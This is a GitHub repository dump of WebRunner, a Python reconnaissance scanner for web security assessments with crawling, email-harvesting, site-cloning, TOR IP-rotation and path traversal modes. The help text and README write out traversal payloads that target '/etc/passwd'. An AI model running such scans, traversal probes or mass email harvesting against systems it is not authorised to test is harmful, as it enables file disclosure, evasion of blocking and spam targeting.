├── requirements.txt ├── core ├── validate.py ├── core.py ├── extractor.py └── traversal.py ├── WebRunner.py └── README.md /requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4==4.13.3 2 | bs4==0.0.2 3 | certifi==2025.1.31 4 | charset-normalizer==3.4.1 5 | idna==3.10 6 | requests==2.32.3 7 | soupsieve==2.6 8 | stem==1.8.2 9 | typing_extensions==4.12.2 10 | urllib3==2.3.0 11 | -------------------------------------------------------------------------------- /core/validate.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | class formats: 4 | def validate_url(url): 5 | url_pattern = re.compile( 6 | r'^(https?:\/\/)' 7 | r'(?:(?:\d{1,3}\.){3}\d{1,3}' 8 | r'|' 9 | r'[\da-z\.-]+\.[a-z\.]{2,6})' 10 | r'(?::\d{1,5})?' 11 | r'(\/[^\s]*)?$' 12 | ) 13 | 14 | if url_pattern.match(url): 15 | return True 16 | 17 | def validate_email(text): 18 | email_pattern = re.compile( 19 | r'[\w\.-]+@[\w\.-]{7,}' 20 | ) 21 | 22 | return email_pattern.findall(text) 23 | -------------------------------------------------------------------------------- /WebRunner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | from core.traversal import * 5 | from core.extractor import url_extractor, email_extractor, regx, clone 6 | from core.core import menu 7 | 8 | parser = argparse.ArgumentParser(add_help=False) 9 | ### attack mode 10 | parser.add_argument('mode',help='Set attack mode (traversal,scraping,regx,email-extractor)') 11 | 12 | ### General args 13 | parser.add_argument('--url',help='Set a single target URL') 14 | parser.add_argument('--url-file',help='Set txt file with multiple targets URL') 15 | parser.add_argument('--user-agent',help='Set user agent header for every http request',default="WebRunner v2.0 agent") 16 | parser.add_argument('-k','--no-tls-validation',action='store_false') 17 | parser.add_argument('-r','--follow-redirect',action='store_true') 18 | parser.add_argument('-c','--cookie',help='Set cookies to use for the requests') 19 | parser.add_argument('--timeout',default=int(10),help='Time each thread waits between requests (10s by default)') 20 | parser.add_argument('--proxy',help='Set proxy setting for all requests, use or ') 21 | parser.add_argument('--rnd-ip',action='store_true',help="Changes TOR proxy IP for every requests") 22 | parser.add_argument('--max-depth',help='this can help for traversal payloads or scrapping/crawling',default=int(3)) 23 | parser.add_argument('-h','--help',action='store_true',help="") 24 | 25 | ### args for traversal 26 | parser.add_argument('--os',help='Set target Operation System (windows/linux/all)',default="linux") 27 | parser.add_argument('-t','--threads',default=int(10),help='Set threads') 28 | parser.add_argument('--min-depth',help='this can help for traversal payloads, if u dont wanna set ../ and wanna start with ../../../ for payloads',default=int(1)) 29 | parser.add_argument('--custom-path',help='Set a custom path to create payloads example path "cgi-bin/", every payload will start as "cgi-bin/../../../etc/passwd') 30 | parser.add_argument('--custom-traversal-string',help='Set a custom traversal string to create payloads example path "....//", every payload will start as ""....//....//etc/passwd. 
Comma-separated list of items') 31 | parser.add_argument('--custom-file',help='Set a custom file disclosure to create payloads example "etc/custom_file.txt", every payload will end as "../../../etc/custom_file.txt". Comma-separated list of items"') 32 | parser.add_argument('-v','--verbose',action='store_true',help='Show all requested URLs with the payload used ') 33 | 34 | ### args for clone mode 35 | parser.add_argument('-n','--name',help='Set project name for clone module.') 36 | 37 | ### arg for regx mode 38 | parser.add_argument('--regx',help='Set regx string to search into target website.') 39 | 40 | 41 | args = parser.parse_args() 42 | custom_path_list = args.custom_path.split(',') if args.custom_path else [] 43 | custom_traversal_strings_list = args.custom_traversal_string.split(',') if args.custom_traversal_string else [] 44 | custom_file = args.custom_file.split(',') if args.custom_file else [] 45 | 46 | ATTACK_MODE=args.mode 47 | help_menu = menu(args.mode,args.user_agent,args.url,args.url_file,args.cookie,args.no_tls_validation,args.follow_redirect,args.timeout,args.proxy,args.max_depth,args.regx,args.os,args.name,args.min_depth,args.threads,args.verbose,custom_path_list,custom_traversal_strings_list,custom_file,args.rnd_ip) 48 | 49 | if ATTACK_MODE=='traversal': 50 | if args.help: 51 | help_menu.traversal_help() 52 | sys.exit() 53 | help_menu.print() 54 | traversal_mode = traversal(args.url,args.url_file,args.timeout,args.follow_redirect,args.cookie,args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.os,args.threads,args.min_depth,args.verbose,custom_path_list,custom_traversal_strings_list,custom_file,args.rnd_ip) 55 | traversal_mode.scanner() 56 | 57 | elif ATTACK_MODE=='scraping': 58 | if args.help: 59 | help_menu.scraping_help() 60 | sys.exit() 61 | help_menu.print() 62 | scraping = url_extractor(args.url,args.url_file,args.timeout,args.follow_redirect, args.cookie, args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.rnd_ip) 63 | scraping.scanner() 64 | 65 | elif ATTACK_MODE=='email-extractor': 66 | if args.help: 67 | help_menu.email_extractor_help() 68 | sys.exit() 69 | help_menu.print() 70 | extractor = email_extractor(args.url,args.url_file,args.timeout,args.follow_redirect, args.cookie, args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.rnd_ip) 71 | extractor.scanner() 72 | 73 | elif ATTACK_MODE=='regx': 74 | if args.help: 75 | help_menu.regx_help() 76 | sys.exit() 77 | help_menu.print() 78 | regx_seek = regx(args.url,args.url_file,args.timeout,args.follow_redirect, args.cookie, args.user_agent,args.no_tls_validation,args.proxy,args.max_depth,args.regx,args.rnd_ip) 79 | regx_seek.scanner() 80 | 81 | elif ATTACK_MODE=='clone': 82 | if args.help: 83 | help_menu.clone_help() 84 | sys.exit() 85 | help_menu.print() 86 | clone_mode = clone(args.url,args.timeout,args.user_agent,args.no_tls_validation,args.proxy,args.name,args.rnd_ip) 87 | clone_mode.scanner() 88 | 89 | else: 90 | msg.error("Attack mode is required! 
You can use [ scraping | email-extractor | regx | clone | traversal ]") -------------------------------------------------------------------------------- /core/core.py: -------------------------------------------------------------------------------- 1 | from datetime import datetime 2 | import random, string 3 | from stem import Signal 4 | from stem.control import Controller 5 | 6 | class c: 7 | Black = '\033[30m' 8 | Red = '\033[31m' 9 | Green = '\033[32m' 10 | Orange = '\033[33m' 11 | Blue = '\033[34m' 12 | Purple = '\033[35m' 13 | Reset = '\033[0m' 14 | Cyan = '\033[36m' 15 | LightGrey = '\033[37m' 16 | DarkGrey = '\033[90m' 17 | LightRed = '\033[91m' 18 | LightGreen = '\033[92m' 19 | Yellow = '\033[93m' 20 | LightBlue = '\033[94m' 21 | Pink = '\033[95m' 22 | LightCyan = '\033[96m' 23 | 24 | class tor_conf: 25 | def change_ip(): 26 | try: 27 | c = Controller.from_port(port=9051) 28 | c.authenticate() 29 | c.signal(Signal.NEWNYM) 30 | c.close() 31 | except: 32 | msg.error("You need to set ControlPort 9051 and CookieAuthentication 1 in torrc file") 33 | 34 | class msg: 35 | def error(msg): 36 | print(f"[{c.Red}*{c.Reset}] {datetime.now()} - {c.Red}{msg}{c.Reset}") 37 | 38 | def info(msg): 39 | print(f"[{c.Blue}i{c.Reset}] {datetime.now()} - {c.Blue}{msg}{c.Reset}") 40 | 41 | def success(msg): 42 | print(f"[{c.Green}+{c.Reset}] {datetime.now()} - {c.Green}{msg}{c.Reset}") 43 | 44 | def warning(msg): 45 | print(f"[{c.Orange}!{c.Reset}] {datetime.now()} - {c.Orange}{msg}{c.Reset}") 46 | 47 | def normal(msg): 48 | print(f"[{c.Blue}!{c.Reset}] {datetime.now()} - {c.Reset}{msg}{c.Reset}") 49 | 50 | class random_data: 51 | def RandomStrings(self, size=10, chars=string.ascii_lowercase + string.digits): 52 | return ''.join(random.choice(chars) for _ in range(size)) 53 | 54 | class menu: 55 | def __init__(self,module,user_agent, url, url_file, cookie, tls_validation, follow_redirect, timeout, proxy, depth,regx,os,name,min_depth,threads,verbose,custom_path=[],custom_traversal_strings=[],custom_file=[],change_tor_ip=False): 56 | self.module = module 57 | self.user_agent = user_agent 58 | self.url = url 59 | self.url_file = url_file 60 | self.cookie = cookie 61 | self.tls_validation = tls_validation 62 | self.follow_redirect = follow_redirect 63 | self.timeout = timeout 64 | self.proxy = proxy 65 | self.depth = depth 66 | self.regx = regx 67 | self.os = os 68 | self.name = name 69 | self.min_depth = min_depth 70 | self.threads = threads 71 | self.verbose = verbose 72 | self.custom_traversal_strings = custom_traversal_strings 73 | self.custom_path = custom_path 74 | self.custom_file = custom_file 75 | self.change_tor_ip = change_tor_ip 76 | 77 | def print(self): 78 | self.WebRunnerBanner() 79 | Message=f""" 80 | - Attack mode: {c.Green}{self.module}{c.Reset} 81 | - User-agent: {c.Green}{self.user_agent}{c.Reset} 82 | - TLS Validation: {c.Green}{self.tls_validation}{c.Reset} 83 | - Follow redirect: {c.Green}{self.follow_redirect}{c.Reset} 84 | - Timeout: {c.Green}{self.timeout}{c.Reset} 85 | - Max Depth: {c.Green}{self.depth}{c.Reset} 86 | - Min Depth: {c.Green}{self.min_depth}{c.Reset}""" 87 | 88 | if self.url: 89 | Message=f"""{Message} 90 | - Target url: {c.Green}{self.url}{c.Reset}""" 91 | else: 92 | Message=f"""{Message} 93 | - Target url file: {c.Green}{self.url_file}{c.Reset}""" 94 | 95 | if self.cookie: 96 | Message=f"""{Message} 97 | - Cookie: {c.Green}{self.cookie}{c.Reset}""" 98 | 99 | if self.proxy: 100 | Message=f"""{Message} 101 | - Proxy: {c.Green}{self.proxy}{c.Reset}""" 102 | 103 | if 
self.proxy and self.change_tor_ip: 104 | Message=f"""{Message} 105 | - Random TOR IP: {c.Green}{self.change_tor_ip}{c.Reset}""" 106 | 107 | if self.os: 108 | Message=f"""{Message} 109 | - OS: {c.Green}{self.os}{c.Reset}""" 110 | 111 | if self.name: 112 | Message=f"""{Message} 113 | - Project name: {c.Green}{self.name}{c.Reset}""" 114 | 115 | if self.regx: 116 | Message=f"""{Message} 117 | - RegEx : {c.Green}{self.regx}{c.Reset}""" 118 | 119 | if self.threads and self.module == "traversal": 120 | Message=f"""{Message} 121 | - Threads : {c.Green}{self.threads}{c.Reset}""" 122 | 123 | if self.verbose and self.module == "traversal": 124 | Message=f"""{Message} 125 | - Verbose : {c.Green}{self.verbose}{c.Reset}""" 126 | 127 | if self.custom_path and self.module == "traversal": 128 | Message=f"""{Message} 129 | - Custom path : {c.Green}{self.custom_path}{c.Reset}""" 130 | 131 | if self.custom_traversal_strings and self.module == "traversal": 132 | Message=f"""{Message} 133 | - Custom traversal strings : {c.Green}{self.custom_traversal_strings}{c.Reset}""" 134 | 135 | if self.custom_file and self.module == "traversal": 136 | Message=f"""{Message} 137 | - Custom file disclosure : {c.Green}{self.custom_file}{c.Reset}""" 138 | 139 | 140 | print(f"""{Message} 141 | ======================================================================================================""") 142 | 143 | 144 | 145 | def WebRunnerBanner(self): 146 | print(f""" 147 | ██╗ ██╗███████╗██████╗ ██████╗ ██╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗ 148 | ██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗ 149 | ██║ █╗ ██║█████╗ ██████╔╝██████╔╝██║ ██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝ 150 | ██║███╗██║██╔══╝ ██╔══██╗██╔══██╗██║ ██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗ 151 | ╚███╔███╔╝███████╗██████╔╝██║ ██║╚██████╔╝██║ ╚████║██║ ╚████║███████╗██║ ██║ 152 | ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ 153 | 154 | Coded by:{c.Red} sp34rh34d {c.Reset} 155 | twitter: {c.Red}@spearh34d{c.Reset} 156 | Welcome to WebRunner v2.0 [{c.Green}https://github.com/sp34rh34d/WebRunner{c.Reset}] 157 | ======================================================================================================""") 158 | 159 | 160 | def help_general(self): 161 | print(""" 162 | Global Flags: 163 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 164 | -c, --cookie Set cookies to use for every HTTP requests 165 | -k, --no-tls-validation Skip TLS certificate verification 166 | -r, --follow-redirect Follow redirects 167 | --timeout HTTP Timeout (default 10s) 168 | --proxy Set proxy setting for every HTTP request [ or ] 169 | --rnd-ip Changes TOR proxy IP for every requests (torrc file required) 170 | -h, --help Show this message 171 | """) 172 | 173 | def email_extractor_help(self): 174 | print(""" 175 | Uses Email extractor mode 176 | 177 | Usage: 178 | python3 WebRunner.py email-extractor [flags] 179 | 180 | Flags: 181 | --url Set target URL single mode 182 | --url-file Load targets URL from txt file 183 | --max-depth Set depth level to scan 184 | """) 185 | self.help_general() 186 | 187 | def scraping_help(self): 188 | print(""" 189 | Uses Scraping mode 190 | 191 | Usage: 192 | python3 WebRunner.py scraping [flags] 193 | 194 | Flags: 195 | --url Set target URL single mode 196 | --url-file Load targets URL from txt file 197 | --max-depth Set depth level to scan 198 | """) 199 | self.help_general() 200 | 201 | def regx_help(self): 202 | print(""" 203 | Uses Regx mode 204 | 205 | Usage: 206 | python3 
WebRunner.py regx [flags]
207 | 
208 | Flags:
209 |   --url                      Set target URL single mode
210 |   --url-file                 Load target URLs from a txt file
211 |   --regx                     Set RegEx query to search for in every HTTP response
212 |   --max-depth                Set depth level to scan
213 | """)
214 |         self.help_general()
215 | 
216 |     def clone_help(self):
217 |         print("""
218 | Uses Clone mode
219 | 
220 | Usage:
221 |   python3 WebRunner.py clone [flags]
222 | 
223 | Flags:
224 |   --url                      Set target URL single mode
225 |   --url-file                 Load target URLs from a txt file
226 |   --name                     Set project name
227 | """)
228 |         self.help_general()
229 | 
230 |     def traversal_help(self):
231 |         print("""
232 | Uses Path Traversal mode
233 | 
234 | Usage:
235 |   python3 WebRunner.py traversal [flags]
236 | 
237 | Flags:
238 |   --url                      Set target URL single mode
239 |   --url-file                 Load target URLs from a txt file
240 |   --threads                  Set number of threads
241 |   --max-depth                Set depth level to scan
242 |   --min-depth                Set the minimum traversal depth, e.g. start payloads at ../../../ instead of ../
243 |   --os                       Set target Operating System (windows/linux/all)
244 |   --custom-path              Set a custom path for payloads, e.g. "cgi-bin/" makes every payload start with "cgi-bin/../../../etc/passwd"
245 |   --custom-traversal-string  Set a custom traversal string for payloads, e.g. "....//" makes every payload start with "....//....//etc/passwd"
246 |   --custom-file              Set a custom file disclosure for payloads, e.g. "etc/custom_file.txt" makes every payload end with "../../../etc/custom_file.txt". Comma-separated list of items
247 |   -v, --verbose              Show all requested URLs with the payload used
248 | """)
249 |         self.help_general()
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WebRunner
2 | WebRunner is a powerful and versatile reconnaissance scanner designed for web security assessments. It performs comprehensive website scans by extracting key information such as URLs, email addresses, and custom data defined by regular expressions. With configurable crawl depth, users can tailor the scanning process, from shallow overviews to deep, exhaustive analysis, making it ideal for both quick reconnaissance and in-depth security evaluations.
3 | Additionally, WebRunner can clone entire websites, providing an offline replica for further analysis, and it includes specialized scanning features to identify vulnerabilities like path traversal.
4 | 
5 | ### Install
6 | ```
7 | git clone https://github.com/sp34rh34d/WebRunner.git
8 | cd WebRunner
9 | python3 -m venv env
10 | source env/bin/activate
11 | pip3 install -r requirements.txt
12 | chmod +x WebRunner.py
13 | ```
14 | 
15 | ### One-line Installation
16 | ```
17 | git clone https://github.com/sp34rh34d/WebRunner.git && cd WebRunner && python3 -m venv env && source env/bin/activate && pip3 install -r requirements.txt && chmod +x WebRunner.py
18 | ```
19 | 
20 | ## Features
21 | * Web Scraping/Crawler [url | email | RegEx Query]
22 | * Web Cloner
23 | * Path Traversal Scanner
24 | 
25 | ## Pending features
26 | * 403 Bypass Scanner
27 | * SQLi Scanner
28 | 
29 | ## TOR
30 | You can use the TOR project as an HTTP proxy by setting ```HTTPTunnelPort 9055``` and pointing WebRunner at that port with ```--proxy http://127.0.0.1:9055```. If you want to change your IP for every request, use the ```--rnd-ip``` argument; this requires a torrc file, created with the following parameters.
31 | ``` 32 | #torrc file content 33 | HTTPTunnelPort 9055 34 | CookieAuthentication 1 35 | ControlPort 9051 36 | ``` 37 | Then just run ```tor -f torrc``` 38 | 39 | ### Scraping module 40 | ``` 41 | Uses Scraping mode 42 | 43 | Usage: 44 | python3 WebRunner.py scraping [flags] 45 | 46 | Flags: 47 | --url Set target URL single mode 48 | --url-file Load targets URL from txt file 49 | --max-depth Set depth level to scan 50 | 51 | 52 | Global Flags: 53 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 54 | -c, --cookie Set cookies to use for every HTTP requests 55 | -k, --no-tls-validation Skip TLS certificate verification 56 | -r, --follow-redirect Follow redirects 57 | --timeout HTTP Timeout (default 10s) 58 | --proxy Set http proxy setting for every HTTP request [ or ] 59 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 60 | -h, --help Show this message 61 | ``` 62 | 63 | ![Screenshot 2025-03-19 at 10 25 03 AM](https://github.com/user-attachments/assets/8a3ffb2f-5614-41da-b3e0-a12463ef662d) 64 | 65 | 66 | 67 | ### Email extractor module 68 | ``` 69 | Uses Email extractor mode 70 | 71 | Usage: 72 | python3 WebRunner.py email-extractor [flags] 73 | 74 | Flags: 75 | --url Set target URL single mode 76 | --url-file Load targets URL from txt file 77 | --max-depth Set depth level to scan 78 | 79 | 80 | Global Flags: 81 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 82 | -c, --cookie Set cookies to use for every HTTP requests 83 | -k, --no-tls-validation Skip TLS certificate verification 84 | -r, --follow-redirect Follow redirects 85 | --timeout HTTP Timeout (default 10s) 86 | --proxy Set http proxy setting for every HTTP request [ or ] 87 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 88 | -h, --help Show this message 89 | ``` 90 | 91 | ![Screenshot 2025-03-19 at 10 26 37 AM](https://github.com/user-attachments/assets/5199e24e-6bf8-4015-9d0d-6d4e49efc3a2) 92 | 93 | 94 | ### RegEx Query module 95 | ``` 96 | Uses Regx mode 97 | 98 | Usage: 99 | python3 WebRunner.py regx [flags] 100 | 101 | Flags: 102 | --url Set target URL single mode 103 | --url-file Load targets URL from txt file 104 | --regx Set RegEx query to seek into every http response 105 | --max-depth Set depth level to scan 106 | 107 | 108 | Global Flags: 109 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 110 | -c, --cookie Set cookies to use for every HTTP requests 111 | -k, --no-tls-validation Skip TLS certificate verification 112 | -r, --follow-redirect Follow redirects 113 | --timeout HTTP Timeout (default 10s) 114 | --proxy Set http proxy setting for every HTTP request [ or ] 115 | --rnd-ip Changes TOR proxy IP for every requests (torcc file required) 116 | -h, --help Show this message 117 | ``` 118 | 119 | ![Screenshot 2025-03-19 at 10 30 20 AM](https://github.com/user-attachments/assets/c54a757a-dadd-45c6-8b87-d3edd2b29f67) 120 | 121 | 122 | ### Clone mode 123 | ``` 124 | Uses Clone mode 125 | 126 | Usage: 127 | python3 WebRunner.py clone [flags] 128 | 129 | Flags: 130 | --url Set target URL single mode 131 | --url-file Load targets URL from txt file 132 | --name Set project name 133 | 134 | 135 | Global Flags: 136 | --user-agent Set user-agent header, 'DirRunner v1.0' by default 137 | -c, --cookie Set cookies to use for every HTTP requests 138 | -k, --no-tls-validation Skip TLS certificate verification 139 | -r, --follow-redirect Follow redirects 140 | --timeout HTTP Timeout (default 10s) 141 | --proxy Set http proxy setting 
for every HTTP request [ or ]
142 |   --rnd-ip                   Changes TOR proxy IP for every request (torrc file required)
143 |   -h, --help                 Show this message
144 | ```
145 | 
146 | 
147 | 
148 | ![Screenshot 2025-02-19 at 6 38 17 PM](https://github.com/user-attachments/assets/52b57fe4-0e63-42ce-89db-8659d97b1749)
149 | 
150 | 
151 | ### Path Traversal mode
152 | When scanning a single URL, it should end with ```/```, for example ```https://www.example.com/```. You can scan a specific GET parameter in the URL using the ```FUZZ``` string, for example ```https://www.example.com/image?filename=FUZZ```. When you specify a URL such as ```https://www.example.com/path/javascript.js```, the URL used for the scan will be ```https://www.example.com/path/```.
153 | 
154 | ```
155 | Uses Path Traversal mode
156 | 
157 | Usage:
158 |   python3 WebRunner.py traversal [flags]
159 | 
160 | Flags:
161 |   --url                      Set target URL single mode
162 |   --url-file                 Load target URLs from a txt file
163 |   --threads                  Set number of threads
164 |   --max-depth                Set depth level to scan
165 |   --min-depth                Set the minimum traversal depth, e.g. start payloads at ../../../ instead of ../
166 |   --os                       Set target Operating System (windows/linux/all)
167 |   --custom-path              Set a custom path for payloads, e.g. "cgi-bin/" makes every payload start with "cgi-bin/../../../etc/passwd"
168 |   --custom-traversal-string  Set a custom traversal string for payloads, e.g. "....//" makes every payload start with "....//....//etc/passwd"
169 |   --custom-file              Set a custom file disclosure for payloads, e.g. "etc/custom_file.txt" makes every payload end with "../../../etc/custom_file.txt". Comma-separated list of items
170 |   -v, --verbose              Show all requested URLs with the payload used
171 | 
172 | 
173 | Global Flags:
174 |   --user-agent               Set user-agent header, 'WebRunner v2.0 agent' by default
175 |   -c, --cookie               Set cookies to use for every HTTP request
176 |   -k, --no-tls-validation    Skip TLS certificate verification
177 |   -r, --follow-redirect      Follow redirects
178 |   --timeout                  HTTP Timeout (default 10s)
179 |   --proxy                    Set http proxy setting for every HTTP request [ or ]
180 |   --rnd-ip                   Changes TOR proxy IP for every request (torrc file required)
181 |   -h, --help                 Show this message
182 | ```
183 | 
184 | ![Screenshot 2025-03-19 at 12 58 47 PM](https://github.com/user-attachments/assets/5edad741-a3a4-4ff6-a6d6-cfca9ed2ad6e)
185 | 
186 | 
187 | With the ```--custom-path```, ```--custom-traversal-string``` and ```--custom-file``` args:
188 | 
189 | ![Screenshot 2025-03-19 at 1 02 48 PM](https://github.com/user-attachments/assets/dfd6472b-1864-41a0-90bd-bdf314f157c2)
190 | 
191 | 
192 | Using the TOR project as an HTTP proxy with ```--proxy http://127.0.0.1:9055``` and a random IP per request with ```--rnd-ip```. A torrc file is required for this; see the TOR section for the torrc configuration.
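
For reference, a full invocation that combines the traversal flags with the TOR proxy might look like the following sketch (the target URL is only an illustration; the flags are the ones documented above):

```
python3 WebRunner.py traversal --url "https://www.example.com/image?filename=FUZZ" --os linux --threads 10 --proxy http://127.0.0.1:9055 --rnd-ip -k -v
```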
193 | 194 | ![Screenshot 2025-03-19 at 1 09 02 PM](https://github.com/user-attachments/assets/b2a92246-7687-4743-85b6-5c9d5371c44f) 195 | 196 | Requests from TOR Network 197 | ![Screenshot 2025-03-19 at 1 10 48 PM](https://github.com/user-attachments/assets/38f5a85c-1237-4ff3-a7b8-800c70ef6e42) 198 | 199 | 200 | -------------------------------------------------------------------------------- /core/extractor.py: -------------------------------------------------------------------------------- 1 | from core.validate import formats 2 | from core.core import msg, random_data, c, tor_conf 3 | from pathlib import Path 4 | import sys, requests, re, os 5 | from bs4 import BeautifulSoup 6 | from urllib.parse import urljoin, urlparse 7 | from collections import deque 8 | import urllib3 9 | urllib3.disable_warnings() 10 | 11 | class url_extractor: 12 | def __init__(self,target_url,target_url_file,timeout,follow_redirect, cookie, user_agent, tls_validation,proxy_setting, depth,change_tor_ip=False): 13 | self.target_url = target_url 14 | self.target_url_file = target_url_file 15 | self.timeout = int(timeout) 16 | self.follow_redirect = follow_redirect 17 | self.cookie = cookie 18 | self.user_agent = user_agent 19 | self.tls_validation = tls_validation 20 | self.proxy_setting = proxy_setting 21 | self.max_depth = int(depth) 22 | self.urls = [] 23 | self.urls_js = [] 24 | self.urls_img = [] 25 | self.change_tor_ip = change_tor_ip 26 | 27 | def scanner(self): 28 | try: 29 | single_or_multiple_url = 0 30 | if self.target_url: 31 | msg.info(f"starting single scan for url {self.target_url}") 32 | single_or_multiple_url = 0 33 | elif self.target_url_file: 34 | msg.info(f"starting scan for url into the file {self.target_url_file}") 35 | single_or_multiple_url = 1 36 | else: 37 | msg.error("no url detected, use --url or --url-file args") 38 | sys.exit() 39 | 40 | if single_or_multiple_url == 1 : 41 | file = Path(self.target_url_file) 42 | if not file.is_file(): 43 | msg.error(f"file {self.target_url_file} not found!") 44 | sys.exit() 45 | urls_from_file = open(self.target_url_file,"r").read() 46 | for url in urls_from_file.split("\n"): 47 | if formats.validate_url(url): 48 | self.crawl(url,0) 49 | msg.info("done!") 50 | 51 | else: 52 | if not formats.validate_url(self.target_url): 53 | msg.error(f"url {self.target_url} is invalid!") 54 | sys.exit() 55 | 56 | if self.is_alive(self.target_url): 57 | msg.info(f"Connection success for url {self.target_url}") 58 | self.crawl(self.target_url,0) 59 | msg.info("done!") 60 | r = random_data() 61 | filename = "urls_detected_"+ r.RandomStrings() +".txt" 62 | with open(filename ,"a") as f: 63 | for url in self.urls: 64 | f.write(url+"\n") 65 | for url in self.urls_js: 66 | f.write(url+"\n") 67 | for url in self.urls_img: 68 | f.write(url+"\n") 69 | 70 | msg.success(f"file {filename} created!") 71 | except KeyboardInterrupt: 72 | msg.error("Stopped by user!") 73 | sys.exit() 74 | 75 | def is_alive(self,target_url): 76 | try: 77 | headers = { 78 | "User-Agent" : self.user_agent, 79 | "cookie" : self.cookie 80 | } 81 | 82 | proxy_setting = { 83 | "http" : None, 84 | "https" : None 85 | } 86 | 87 | if self.proxy_setting: 88 | proxy_setting = { 89 | "http" : self.proxy_setting, 90 | "https" : self.proxy_setting 91 | } 92 | if self.change_tor_ip: 93 | tor_conf.change_ip() 94 | 95 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 96 | return True 97 | except Exception as e: 
98 | msg.error(e) 99 | return False 100 | 101 | 102 | def crawl(self,url, depth, visited_pages=None, visited_js=None, visited_img=None): 103 | try: 104 | if visited_pages is None: 105 | visited_pages = set() 106 | if visited_js is None: 107 | visited_js = set() 108 | if visited_img is None: 109 | visited_img = set() 110 | 111 | if int(depth) > int(self.max_depth) or url in visited_pages or not formats.validate_url(url) or url in self.urls: 112 | return 113 | 114 | visited_pages.add(url) 115 | self.urls.append(url) 116 | indent = " " * (depth * 2) 117 | msg.warning(f"{indent}Level {depth}: {url}") 118 | 119 | try: 120 | headers = { 121 | "User-Agent" : self.user_agent, 122 | "cookie" : self.cookie 123 | } 124 | 125 | proxy_setting = { 126 | "http" : None, 127 | "https" : None 128 | } 129 | 130 | if self.proxy_setting: 131 | proxy_setting = { 132 | "http" : self.proxy_setting, 133 | "https" : self.proxy_setting 134 | } 135 | if self.change_tor_ip: 136 | tor_conf.change_ip() 137 | 138 | response = requests.get(url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 139 | except Exception as e: 140 | msg.error(" " * (depth * 2) + f"Error fetching {url}: {e}") 141 | return 142 | 143 | soup = BeautifulSoup(response.text, 'html.parser') 144 | 145 | for link in soup.find_all('a', href=True): 146 | new_url = urljoin(url, link['href']) 147 | self.crawl(new_url, depth + 1, visited_pages) 148 | 149 | for script in soup.find_all('script', src=True): 150 | js_url = urljoin(url, script['src']) 151 | if js_url not in visited_js: 152 | visited_js.add(js_url) 153 | self.urls_js.append(js_url) 154 | msg.info(f"{indent} [{c.Orange}JS{c.Blue}] {js_url}") 155 | 156 | for img in soup.find_all('img', src=True): 157 | img_url = urljoin(url, img['src']) 158 | if img_url not in visited_img: 159 | visited_img.add(img_url) 160 | self.urls_img.append(img_url) 161 | msg.info(f"{indent} [{c.Orange}IMG{c.Blue}] {img_url}") 162 | except KeyboardInterrupt: 163 | msg.error("Stopped by user!") 164 | sys.exit() 165 | 166 | class email_extractor: 167 | def __init__(self,target_url,target_url_file,timeout,follow_redirect, cookie, user_agent, tls_validation,proxy_setting, depth,change_tor_ip=False): 168 | self.target_url = target_url 169 | self.target_url_file = target_url_file 170 | self.timeout = int(timeout) 171 | self.follow_redirect = follow_redirect 172 | self.cookie = cookie 173 | self.user_agent = user_agent 174 | self.tls_validation = tls_validation 175 | self.proxy_setting = proxy_setting 176 | self.max_depth = int(depth) 177 | self.emails = [] 178 | self.urls = [] 179 | self.change_tor_ip = change_tor_ip 180 | 181 | def is_alive(self,target_url): 182 | try: 183 | headers = { 184 | "User-Agent" : self.user_agent, 185 | "cookie" : self.cookie 186 | } 187 | 188 | proxy_setting = { 189 | "http" : None, 190 | "https" : None 191 | } 192 | 193 | if self.proxy_setting: 194 | proxy_setting = { 195 | "http" : self.proxy_setting, 196 | "https" : self.proxy_setting 197 | } 198 | if self.change_tor_ip: 199 | tor_conf.change_ip() 200 | 201 | res = requests.get(target_url,headers=headers,allow_redirects=self.follow_redirect, timeout=self.timeout, verify=self.tls_validation, proxies=proxy_setting) 202 | return True 203 | except Exception as e: 204 | msg.error(e) 205 | return False 206 | 207 | def scanner(self): 208 | try: 209 | single_or_multiple_url = 0 210 | if self.target_url: 211 | msg.info(f"starting single scan for url {self.target_url}") 212 | 
single_or_multiple_url = 0 213 | elif self.target_url_file: 214 | msg.info(f"starting scan for url into the file {self.target_url_file}") 215 | single_or_multiple_url = 1 216 | else: 217 | msg.error("no url detected, use --url or --url-file args") 218 | sys.exit() 219 | 220 | if single_or_multiple_url == 1 : 221 | file = Path(self.target_url_file) 222 | if not file.is_file(): 223 | msg.error(f"file {self.target_url_file} not found!") 224 | sys.exit() 225 | urls_from_file = open(self.target_url_file,"r").read() 226 | for url in urls_from_file.split("\n"): 227 | if formats.validate_url(url): 228 | self.crawl(url,0) 229 | msg.info("done!") 230 | 231 | else: 232 | if not formats.validate_url(self.target_url): 233 | msg.error(f"url {self.target_url} is invalid!") 234 | sys.exit() 235 | 236 | if self.is_alive(self.target_url): 237 | msg.info(f"Connection success for url {self.target_url}") 238 | self.crawl(self.target_url,0) 239 | msg.info("done!") 240 | r = random_data() 241 | filename = "extracted_emails_"+ r.RandomStrings() +".txt" 242 | with open(filename ,"a") as f: 243 | for email in self.emails: 244 | f.write(email+"\n") 245 | msg.success(f"file {filename} created!") 246 | except KeyboardInterrupt: 247 | msg.error("Stopped by user!") 